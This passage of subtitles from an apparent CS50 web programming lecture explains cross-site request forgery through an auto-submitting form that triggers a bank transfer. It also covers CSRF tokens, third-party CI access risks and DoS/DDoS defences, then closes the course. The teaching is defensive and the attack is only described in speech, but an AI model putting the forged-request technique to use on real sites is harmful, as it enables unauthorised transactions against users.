01:12:01,421 --> 01:12:01,920
Yeah?

1608
01:12:01,920 --> 01:12:05,185
AUDIENCE: Can you do a POST
request from JavaScript code?

1609
01:12:05,185 --> 01:12:07,560
BRIAN YU: Can you do a POST
request from JavaScript code?

1610
01:12:07,560 --> 01:12:08,739
Certainly you can.

1611
01:12:08,739 --> 01:12:10,530
We actually looked at
ways we could do that

1612
01:12:10,530 --> 01:12:14,561
before when we were talking about
AJAX and making requests to a server

1613
01:12:14,561 --> 01:12:16,560
in order to get more
information from the server

1614
01:12:16,560 --> 01:12:18,660
after we've already loaded the page.

1615
01:12:18,660 --> 01:12:20,542
So that's certainly one option as well.

1616
01:12:20,542 --> 01:12:23,250
Another way we could do it is just
by adding this additional line

1617
01:12:23,250 --> 01:12:26,130
to the body, on load--
when you're done loading--

1618
01:12:26,130 --> 01:12:27,890
here's what the body should do.

1619
01:12:27,890 --> 01:12:32,220
Document.form0, get the first form
in the document and submit it.

1620
01:12:32,220 --> 01:12:34,410
Just by adding that single
line of JavaScript code,

1621
01:12:34,410 --> 01:12:38,080
now as soon as the user loads this
page, this form will be submitted,

1622
01:12:38,080 --> 01:12:42,972
and then that will initiate
the transfer at yourbank.com

1623
01:12:42,972 --> 01:12:46,830
So certainly, this isn't a
good scenario we want to be in.

1624
01:12:46,830 --> 01:12:49,620
This is CSRF, Cross-Site
Request Forgery,

1625
01:12:49,620 --> 01:12:54,540
where we are able to create
a request to some other site

1626
01:12:54,540 --> 01:12:57,690
and pretend that request was
originally from yourbank.com in order

1627
01:12:57,690 --> 01:12:59,040
to initiate the transfer.

1628
01:12:59,040 --> 01:13:02,160
And so long as I know what
parameters that request takes,

1629
01:13:02,160 --> 01:13:03,874
I'm able to forge that request.

1630
01:13:03,874 --> 01:13:05,790
And so the solution, as
was pointed out, which

1631
01:13:05,790 --> 01:13:08,910
is what Django uses and a bunch
of other web frameworks use,

1632
01:13:08,910 --> 01:13:11,880
is to add a special token,
effectively a password.

1633
01:13:11,880 --> 01:13:16,260
Where the idea is that you would
write this inside of your Django code,

1634
01:13:16,260 --> 01:13:19,800
and if you were to look at the HTML
that gets rendered as a result, what's

1635
01:13:19,800 --> 01:13:23,790
actually happening is that
in place of CSRF token,

1636
01:13:23,790 --> 01:13:26,460
the web server, the
Django web server, is

1637
01:13:26,460 --> 01:13:30,390
inserting some long string, some
effectively a token or a password,

1638
01:13:30,390 --> 01:13:32,850
that is associated with
this specific form.

1639
01:13:32,850 --> 01:13:35,220
Such that when the
user submits that form,

1640
01:13:35,220 --> 01:13:37,140
the token is submitted along with it.

1641
01:13:37,140 --> 01:13:40,200
And the server can then check
to see does this token match

1642
01:13:40,200 --> 01:13:41,700
the token that I initially sent out.

1643
01:13:41,700 --> 01:13:44,460
And only, if and only if
they match, then we're

1644
01:13:44,460 --> 01:13:46,290
going to actually initiate the transfer.

1645
01:13:46,290 --> 01:13:50,880
That way, no other website is able to
forge a request to my bank's transfer

1646
01:13:50,880 --> 01:13:53,610
web site because they're not
going to know what the token is.

1647
01:13:53,610 --> 01:13:56,070
It's going to be a new token
every time we make a request,

1648
01:13:56,070 --> 01:14:01,080
and that's going to allow us to avoid
a situation where someone might be able

1649
01:14:01,080 --> 01:14:02,670
to-- from some other site--

1650
01:14:02,670 --> 01:14:08,520
make a request that attacks the
/transfer route in this case.

1651
01:14:08,520 --> 01:14:11,112
So that's why Django has
that CSRF token in place.

1652
01:14:11,112 --> 01:14:13,070
It's to prevent against
those kinds of attacks.

1653
01:14:13,070 --> 01:14:16,350
Flask on its own doesn't, by default,
have this sort of protection built in,

1654
01:14:16,350 --> 01:14:19,830
although there are extensions that
allow you to add on to a Flask

1655
01:14:19,830 --> 01:14:24,120
in order to help add security for
this particular type of attack

1656
01:14:24,120 --> 01:14:25,607
into Flask as well.

1657
01:14:25,607 --> 01:14:27,690
So these are also just
good things to be aware of,

1658
01:14:27,690 --> 01:14:29,795
potential security
vulnerabilities that can exist,

1659
01:14:29,795 --> 01:14:32,670
and things you'll want to think
about as you design your application.

1660
01:14:32,670 --> 01:14:36,660
Can just anyone initiate a transfer
request by submitting a POST request

1661
01:14:36,660 --> 01:14:39,570
or do they need some special
tokens, potentially changing,

1662
01:14:39,570 --> 01:14:42,670
as they go about doing that as well.

1663
01:14:42,670 --> 01:14:44,843
Questions about the
security vulnerabilities

1664
01:14:44,843 --> 01:14:48,300
we've talked about so far?

1665
01:14:48,300 --> 01:14:48,970
OK.

1666
01:14:48,970 --> 01:14:53,140
Let's go ahead and move on from Django
and talk a little bit about CI/CD.

1667
01:14:53,140 --> 01:14:55,090
And so this is relatively
recent, where we

1668
01:14:55,090 --> 01:14:58,690
were talking about how we
might leverage CI tools,

1669
01:14:58,690 --> 01:15:01,210
where we looked at Travis in
particular, as a tool that we

1670
01:15:01,210 --> 01:15:04,630
can use in order to run tests
in order to deploy our code.

1671
01:15:04,630 --> 01:15:07,060
And we connected Travis
to GitHub, whereby

1672
01:15:07,060 --> 01:15:11,200
Travis was able to run tests on our
GitHub code inside of our repositories

1673
01:15:11,200 --> 01:15:14,680
and then check to make sure that
those tests, in fact, passed.

1674
01:15:14,680 --> 01:15:17,770
What vulnerabilities appear there?

1675
01:15:17,770 --> 01:15:20,030
Or are things that we
should be considering

1676
01:15:20,030 --> 01:15:21,620
when we start to think about that?

1677
01:15:21,620 --> 01:15:22,120
Yeah?

1678
01:15:22,120 --> 01:15:24,430
AUDIENCE: You're giving Travis
access to your codebase.

1679
01:15:24,430 --> 01:15:25,060
BRIAN YU: Yeah, exactly.

1680
01:15:25,060 --> 01:15:27,230
We're now giving Travis
access to our codebase.

1681
01:15:27,230 --> 01:15:31,280
So whereas before, our code was
stored on GitHub and GitHub alone,

1682
01:15:31,280 --> 01:15:33,280
such that, certainly, if
GitHub was compromised,

1683
01:15:33,280 --> 01:15:35,480
now our code is compromised as well.

1684
01:15:35,480 --> 01:15:39,310
Now we've given Travis access to
all of our private repositories

1685
01:15:39,310 --> 01:15:41,620
on GitHub potentially,
such that now there

1686
01:15:41,620 --> 01:15:43,609
are two points at
which being compromised

1687
01:15:43,609 --> 01:15:45,400
could result in our
code being compromised.

1688
01:15:45,400 --> 01:15:48,280
Whereby if GitHub is compromised,
our code is compromised.

1689
01:15:48,280 --> 01:15:51,281
But likewise, if Travis is
compromised for some security reason,

1690
01:15:51,281 --> 01:15:53,530
then our code might also be
compromised because Travis

1691
01:15:53,530 --> 01:15:56,260
has access to our GitHub account.

1692
01:15:56,260 --> 01:15:58,540
And so any time you
deal with accounts that

1693
01:15:58,540 --> 01:16:02,319
are able to grant permission to
other applications or other accounts

1694
01:16:02,319 --> 01:16:05,110
to get access to that information,
that's where there's potentially

1695
01:16:05,110 --> 01:16:06,860
room for security vulnerabilities.

1696
01:16:06,860 --> 01:16:09,120
And so we see that with
GitHub, where GitHub

1697
01:16:09,120 --> 01:16:11,680
is allowed to authorize other
applications if you give them

1698
01:16:11,680 --> 01:16:14,080
permission to have access
to your information as well.

1699
01:16:14,080 --> 01:16:15,871
But you see this in
other websites as well.

1700
01:16:15,871 --> 01:16:18,850
In fact, Facebook does this, and
been under controversy recently,

1701
01:16:18,850 --> 01:16:23,470
for the idea that it can grant
third party applications the right

1702
01:16:23,470 --> 01:16:25,120
to look at your user information.

1703
01:16:25,120 --> 01:16:27,370
And if you grant a third
party application that right,

1704
01:16:27,370 --> 01:16:30,190
now if any one of those is compromised,
then your own user information

1705
01:16:30,190 --> 01:16:30,815
is compromised.

1706
01:16:30,815 --> 01:16:32,890
And so it's the same
type of thing, where

1707
01:16:32,890 --> 01:16:37,120
you want to be careful about if
you're giving access to one website,

1708
01:16:37,120 --> 01:16:39,460
giving one website access
to your user information

1709
01:16:39,460 --> 01:16:44,050
or your code and your repositories,
then what other services also

1710
01:16:44,050 --> 01:16:46,641
have the same access to
that information as well.

1711
01:16:46,641 --> 01:16:48,640
And so if you're the one
designing the services,

1712
01:16:48,640 --> 01:16:51,820
you want to be careful about what
other services you give access to.

1713
01:16:51,820 --> 01:16:53,710
And if you're the one
using GitHub or Travis,

1714
01:16:53,710 --> 01:16:56,980
you also want to be careful about
how many different third party

1715
01:16:56,980 --> 01:17:02,670
services have access to all of your
private repositories for example.

1716
01:17:02,670 --> 01:17:05,860
And so as a final example, as
we move on to, just recently

1717
01:17:05,860 --> 01:17:08,200
last week, in terms of the
topics we were talking about,

1718
01:17:08,200 --> 01:17:11,050
we talked a little bit about
scalability and the idea

1719
01:17:11,050 --> 01:17:13,960
that once we've written our application
and we're ready to deploy it,

1720
01:17:13,960 --> 01:17:17,417
we need to think about how we're going
to scale this application as more

1721
01:17:17,417 --> 01:17:19,000
and more users start working about it.

1722
01:17:19,000 --> 01:17:22,600
We talked about load balancers and
having multiple, different servers.

1723
01:17:22,600 --> 01:17:26,050
And we talked about, in
particular, that any server

1724
01:17:26,050 --> 01:17:29,984
is a finite machine that can only
handle a certain number of requests

1725
01:17:29,984 --> 01:17:31,150
in a certain amount of time.

1726
01:17:31,150 --> 01:17:34,720
Maybe x requests per second for
instance, where x is some number.

1727
01:17:34,720 --> 01:17:39,160
And what potential vulnerabilities
or exploits come about there?

1728
01:17:39,160 --> 01:17:41,140
What could a potentially
malicious hacker

1729
01:17:41,140 --> 01:17:46,184
try to do knowing the constraints
of what our systems are capable of?

1730
01:17:46,184 --> 01:17:50,056
AUDIENCE: Like [INAUDIBLE]
can start DDoSing your system,

1731
01:17:50,056 --> 01:17:52,000
sending a bunch of
requests at the same time.

1732
01:17:52,000 --> 01:17:52,480
BRIAN YU: Exactly.

1733
01:17:52,480 --> 01:17:53,646
Sending a bunch of requests.

1734
01:17:53,646 --> 01:17:57,620
So if a computer, for instance, is
going to-- if our server, for instance,

1735
01:17:57,620 --> 01:18:02,046
can only handle 1,000 requests
per second, and one hacker,

1736
01:18:02,046 --> 01:18:05,170
on their computer, decides that they
want to try and shut down our system--

1737
01:18:05,170 --> 01:18:07,840
maybe they're going to send
1,001 request in a single second

1738
01:18:07,840 --> 01:18:08,800
to our server.

1739
01:18:08,800 --> 01:18:12,895
And this is what we'll generally call
a DoS, or denial-of-service attack,

1740
01:18:12,895 --> 01:18:17,440
where a user tries to send a
request after request after request

1741
01:18:17,440 --> 01:18:19,390
in an attempt to overload
our servers in order

1742
01:18:19,390 --> 01:18:22,330
to try and make sure that we're
unable to handle all the requests that

1743
01:18:22,330 --> 01:18:22,913
are coming in.

1744
01:18:22,913 --> 01:18:26,070
And if we're handling all of the
requests coming in from one user,

1745
01:18:26,070 --> 01:18:29,080
then we're potentially not
able to handle requests

1746
01:18:29,080 --> 01:18:31,900
coming from other people as well.

1747
01:18:31,900 --> 01:18:34,450
Of course, this probably
isn't too much of an issue

1748
01:18:34,450 --> 01:18:38,050
if we've got dozens
and dozens of servers

1749
01:18:38,050 --> 01:18:41,020
and only one computer is the
one making a lot of requests.

1750
01:18:41,020 --> 01:18:42,790
Which is why the next
thing you mentioned

1751
01:18:42,790 --> 01:18:45,950
was also a potential exploit
or a potential concern,

1752
01:18:45,950 --> 01:18:50,140
which is that what if it's not just
one, single computer, but a whole botnet

1753
01:18:50,140 --> 01:18:54,550
of a bunch of computers that are all
trying to make requests to the same web

1754
01:18:54,550 --> 01:18:55,900
server at the same time?

1755
01:18:55,900 --> 01:18:57,820
This is what we generally
call a DDoS attack,

1756
01:18:57,820 --> 01:18:59,980
a Distributed
denial-of-service attack, where

1757
01:18:59,980 --> 01:19:01,840
we have a lot of
different computers that

1758
01:19:01,840 --> 01:19:05,510
are all trying to make requests at the
same time to our same web application.

1759
01:19:05,510 --> 01:19:07,990
And as a result, it's quite
likely that the web application

1760
01:19:07,990 --> 01:19:11,120
might be overloaded by all these
requests and be unable to handle it.

1761
01:19:11,120 --> 01:19:15,037
And so what are ways of potentially
dealing with a DDoS attack?

1762
01:19:15,037 --> 01:19:17,620
Of a bunch of people trying to
make requests at the same time,

1763
01:19:17,620 --> 01:19:22,071
trying to shut down our server by
overloading it with too many requests?

1764
01:19:22,071 --> 01:19:22,570
Yeah.

1765
01:19:22,570 --> 01:19:24,400
AUDIENCE: Limit how many
requests they can make.

1766
01:19:24,400 --> 01:19:25,790
BRIAN YU: Try and limit how
many requests they can make.

1767
01:19:25,790 --> 01:19:27,760
So certainly one potential
approach to dealing

1768
01:19:27,760 --> 01:19:31,540
with DDoS attacks is to try and add
some sort of filtering system of trying

1769
01:19:31,540 --> 01:19:34,470
to-- before it actually gets to
the server, try and filter and see

1770
01:19:34,470 --> 01:19:35,770
is this a valid request or not?

1771
01:19:35,770 --> 01:19:37,965
And maybe there are heuristics
you can use for that.

1772
01:19:37,965 --> 01:19:40,090
And certainly, if you can
limit people, that if you

1773
01:19:40,090 --> 01:19:43,540
notice that this particular
computer is making a lot of requests

1774
01:19:43,540 --> 01:19:45,880
at the same time or in a
short amount of time, then

1775
01:19:45,880 --> 01:19:47,671
maybe you can put
downward pressure on that

1776
01:19:47,671 --> 01:19:49,380
by blacklisting that particular user.

1777
01:19:49,380 --> 01:19:51,550
So that's certainly something
we could think about as well.

1778
01:19:51,550 --> 01:19:53,466
But in the end of things,
it really often does

1779
01:19:53,466 --> 01:19:56,340
come down to just a battle of
resources, of who has more resources.

1780
01:19:56,340 --> 01:19:58,810
Is it the adversary or is it yourself?

1781
01:19:58,810 --> 01:20:01,186
And so oftentimes this is not
something that you can just

1782
01:20:01,186 --> 01:20:03,185
deal with at the web
application level, but it's

1783
01:20:03,185 --> 01:20:06,390
something that needs to be dealt with
at the server level or the ISP level.

1784
01:20:06,390 --> 01:20:08,280
Where you really need to make
sure that your infrastructure is

1785
01:20:08,280 --> 01:20:11,550
in place, especially if you're
dealing with a large web application,

1786
01:20:11,550 --> 01:20:15,360
to make sure that you're able to
handle all of that potential traffic.

1787
01:20:15,360 --> 01:20:18,450
And so certainly, the end idea
of this and of all the topics

1788
01:20:18,450 --> 01:20:21,420
we've talked about so far today
is that through all of the things

1789
01:20:21,420 --> 01:20:24,590
we've talked about, whether it was
just a simple, static HTML web page

1790
01:20:24,590 --> 01:20:28,170
or dealing with scalability and Flask
and Django and other web services,

1791
01:20:28,170 --> 01:20:31,710
or JavaScript and how we might be able
to inject JavaScript code into our web

1792
01:20:31,710 --> 01:20:35,070
application, there are security
vulnerabilities everywhere.

1793
01:20:35,070 --> 01:20:37,170
And it's definitely a
good idea to be thinking

1794
01:20:37,170 --> 01:20:39,300
about what those
vulnerabilities might be

1795
01:20:39,300 --> 01:20:42,840
and how we might be able to
deal with them when they arrive.

1796
01:20:42,840 --> 01:20:47,190
And so now let's think about
moving beyond just this course

1797
01:20:47,190 --> 01:20:49,440
as we arrive at the
conclusion of the course.

1798
01:20:49,440 --> 01:20:50,400
What comes next?

1799
01:20:50,400 --> 01:20:52,020
If this is still something
that interests you,

1800
01:20:52,020 --> 01:20:53,370
if web programming is
something that you're

1801
01:20:53,370 --> 01:20:55,291
interested in continuing
to learn more about,

1802
01:20:55,291 --> 01:20:57,540
we were just really barely
scratching the surface here

1803
01:20:57,540 --> 01:21:00,180
when it came to programming
with Python and JavaScript.

1804
01:21:00,180 --> 01:21:04,170
We looked at Flask and Django in
particular as the web frameworks

1805
01:21:04,170 --> 01:21:07,230
that we were using in order to build
and design and deploy our websites.

1806
01:21:07,230 --> 01:21:09,800
But those certainly are
not the only options.

1807
01:21:09,800 --> 01:21:12,304
There are other web frameworks
that are gaining popularity

1808
01:21:12,304 --> 01:21:14,220
in modern times, nowadays,
that are definitely

1809
01:21:14,220 --> 01:21:17,011
worth looking into if this is the
sort of thing that interests you.

1810
01:21:17,011 --> 01:21:20,100
Generally, we can divide them
into server-side frameworks,

1811
01:21:20,100 --> 01:21:23,130
the sort of frameworks that are going
to be running like Flask or Django

1812
01:21:23,130 --> 01:21:28,500
on our web server somewhere,
where Express.js and Ruby on Rails

1813
01:21:28,500 --> 01:21:31,420
are examples of some server-side
frameworks that we'll commonly use.

1814
01:21:31,420 --> 01:21:32,086
Actually, sorry.

1815
01:21:32,086 --> 01:21:35,010
This is mislocated a little bit.

1816
01:21:35,010 --> 01:21:38,794
And client-side frameworks include
things like React or Angular

1817
01:21:38,794 --> 01:21:41,460
that are common frameworks that
are used on the client-side now,

1818
01:21:41,460 --> 01:21:44,460
in order to generate
components that are displayed

1819
01:21:44,460 --> 01:21:47,630
that are able to interact with
the web server in some way.

1820
01:21:47,630 --> 01:21:50,140
And so these are definitely
things to look at as well.

1821
01:21:50,140 --> 01:21:53,019
And then when it comes to actually
taking your web application

1822
01:21:53,019 --> 01:21:54,810
and deploying it to
the internet, if that's

1823
01:21:54,810 --> 01:21:56,880
something that's of
interest to you as well,

1824
01:21:56,880 --> 01:21:58,740
there are a whole
number of other services

1825
01:21:58,740 --> 01:22:00,156
that you can use as well for that.

1826
01:22:00,156 --> 01:22:02,100
So GitHub Pages was one
that we looked at way

1827
01:22:02,100 --> 01:22:04,391
at the very beginning of the
course, which is generally

1828
01:22:04,391 --> 01:22:08,250
used if we just want to deploy some
static content to a page like HTML

1829
01:22:08,250 --> 01:22:09,540
and CSS and JavaScript.

1830
01:22:09,540 --> 01:22:11,269
And that's totally
fine for GitHub Pages.

1831
01:22:11,269 --> 01:22:14,310
But if we want to run a web server,
we're going to need a little bit more

1832
01:22:14,310 --> 01:22:15,160
than that.

1833
01:22:15,160 --> 01:22:17,280
And so we did look a
little bit at Heroku

1834
01:22:17,280 --> 01:22:19,310
when we were thinking
about using our database.

1835
01:22:19,310 --> 01:22:23,370
So Heroku is a service that allows us to
host web applications on the internet.

1836
01:22:23,370 --> 01:22:26,400
It makes it relatively easy to take
a Flask or Django web application

1837
01:22:26,400 --> 01:22:27,252
and host it.

1838
01:22:27,252 --> 01:22:30,210
And in particular, it makes it very
easy to hook that up to a database,

1839
01:22:30,210 --> 01:22:33,150
for instance, in order to connect
it with a PostgreSQL database,

1840
01:22:33,150 --> 01:22:35,400
as we did in one of the
early projects in order

1841
01:22:35,400 --> 01:22:37,560
to allow us to deploy that as well.

1842
01:22:37,560 --> 01:22:41,580
But if you're looking for even more
power and even more feature-filled web

1843
01:22:41,580 --> 01:22:44,910
hosting than that, you can take a look
at Amazon Web Services or Google Cloud

1844
01:22:44,910 --> 01:22:48,360
or Microsoft Azure, all of which
offer a lot of different services

1845
01:22:48,360 --> 01:22:51,300
for taking web applications and
deploying them to the internet.

1846
01:22:51,300 --> 01:22:53,841
They often will use Docker,
which we looked at a little while

1847
01:22:53,841 --> 01:22:56,790
back when we were talking about
containerizing our application

1848
01:22:56,790 --> 01:22:59,820
and bundling together our web
application with the database

1849
01:22:59,820 --> 01:23:03,000
and any other services that might be
involved in running that application.

1850
01:23:03,000 --> 01:23:04,860
And so certainly these
are services that you

1851
01:23:04,860 --> 01:23:07,680
can use as well if you're thinking
about actually building out

1852
01:23:07,680 --> 01:23:10,350
one of these web applications
and deploying it to the internet.

1853
01:23:10,350 --> 01:23:13,560
And these larger services
like AWS or Microsoft Azure,

1854
01:23:13,560 --> 01:23:16,786
they have the ability to take care
of some of the scalability concerns

1855
01:23:16,786 --> 01:23:17,910
that we were talking about.

1856
01:23:17,910 --> 01:23:20,310
The ability to add
load balancers that are

1857
01:23:20,310 --> 01:23:23,212
able to make sure that
we have enough servers

1858
01:23:23,212 --> 01:23:25,920
to make sure that we're able to
handle all the requests coming in

1859
01:23:25,920 --> 01:23:27,210
from all the different users.

1860
01:23:27,210 --> 01:23:29,700
And they do auto scaling such
that as more users come in,

1861
01:23:29,700 --> 01:23:33,130
we can increase the number of servers or
decrease the number of servers as well.

1862
01:23:33,130 --> 01:23:36,600
And so these are increasingly
popular tools and technologies

1863
01:23:36,600 --> 01:23:39,780
that are ways of allowing people to
take web applications that they're

1864
01:23:39,780 --> 01:23:44,010
building on their own computers and
ultimately deploy them to the internet.

1865
01:23:44,010 --> 01:23:46,586
Before we wrap up, I just want
to make sure to say thank you

1866
01:23:46,586 --> 01:23:48,960
to all the people that were
really instrumental in making

1867
01:23:48,960 --> 01:23:50,040
the course possible.

1868
01:23:50,040 --> 01:23:53,060
To David, my co-instructor, who
unfortunately couldn't be here today.

1869
01:23:53,060 --> 01:23:56,207
But also to our great teaching
fellows, Anushree and Elle and Rodrigo

1870
01:23:56,207 --> 01:23:58,290
and Sebastian and Jessica
for running the course's

1871
01:23:58,290 --> 01:24:00,210
office hours in the course's sections.

1872
01:24:00,210 --> 01:24:03,360
And of course, the CS50's
production team, Ramon and Andrew

1873
01:24:03,360 --> 01:24:06,450
and Max and Meredith and Ian
and Scully and Dan and Arturo

1874
01:24:06,450 --> 01:24:09,180
for making the lectures possible
and the lecture videos possible.

1875
01:24:09,180 --> 01:24:10,230
Thank you to you all.

1876
01:24:10,230 --> 01:24:13,560
And of course, finally, thank you to all
of you for joining us in this course,

1877
01:24:13,560 --> 01:24:16,230
for learning about web programming
with Python and JavaScript.

1878
01:24:16,230 --> 01:24:17,160
Hope you enjoyed it.

1879
01:24:17,160 --> 01:24:20,070
Hope you got an opportunity to
work on some hands-on projects that

1880
01:24:20,070 --> 01:24:22,890
were exciting and ultimately
showed you the power and capacity

1881
01:24:22,890 --> 01:24:26,100
that Python and JavaScript have for
building really dynamic and really

1882
01:24:26,100 --> 01:24:27,840
interesting web applications.

1883
01:24:27,840 --> 01:24:31,029
Can't wait to see what you guys
continue to do with your final projects.

1884
01:24:31,029 --> 01:24:33,570
But that's it for web programming
with Python and JavaScript,

1885
01:24:33,570 --> 01:24:35,640
so thank you all so much.

1886
01:24:35,640 --> 01:24:39,890
[APPLAUSE]

1887
01:24:39,890 --> 01:24:40,641